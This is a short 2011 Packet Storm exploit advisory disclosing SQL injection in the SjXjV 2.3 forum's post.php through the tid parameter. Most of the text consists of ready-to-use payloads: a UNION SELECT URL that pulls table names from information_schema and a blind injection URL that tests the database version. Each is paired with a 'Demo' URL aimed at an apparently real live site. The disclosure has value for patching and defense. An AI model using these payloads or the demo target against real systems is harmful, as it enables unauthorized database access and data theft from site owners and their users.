SjXjV 2.3 SQL Injection

2011-10-28T00:00:00
ID PACKETSTORM:106346
Type packetstorm
Reporter 599eme Man
Modified 2011-10-28T00:00:00

Description

                                        
                                            `_00000__00000__00000__00000__0___0__00000____0___0___000___0___0_  
_0______0___0__0___0__0______00_00__0________00_00__0___0__00_00_  
_0000___00000__00000__00000__0_0_0__00000____0_0_0__0___0__0_0_0_  
_____0______0______0__0______0___0__0________0___0__00000__0___0_  
_0000___00000__00000__00000__0___0__00000____0___0__0___0__0___0_  
_________________________________________________________________  
  
  
# [+] SjXjV-2.3 (post tid) Remote SQL Injection Vulnerabilities  
# [+] Software : SjXjV-2.3  
# [+] Download : http://www.shijiexuexi.cn  
# [+] Author : 599eme Man  
# [+] Contact : Flouf@live.fr  
#  
#[------------------------------------------------------------------------------------]  
#   
# [+] Vulnerability  
#  
# [+] SQL  
#  
# - http://site.com/post.php?fid=41&tid=-51%20union%20select%201,2,3,4,5,6,7,8,group_concat%28table_name%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables+where+table_schema%20=database%28%29--  
#  
# [+] Demo  
#  
# - http://zeed.tk/bbs/wap/post.php?fid=41&tid=-51%20union%20select%201,2,3,4,5,6,7,8,group_concat%28table_name%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables+where+table_schema%20=database%28%29--  
#  
# [+] Blind SQL  
#  
# - http://site.com/post.php?fid=41&tid=51 and substring(@@version,1,1)=5  
#  
# [+] Demo  
#   
# - http://zeed.tk/bbs/wap/post.php?fid=41&tid=51 and substring(@@version,1,1)=5  
#  
#[------------------------------------------------------------------------------------]  
#  
#########################################################################################################  
`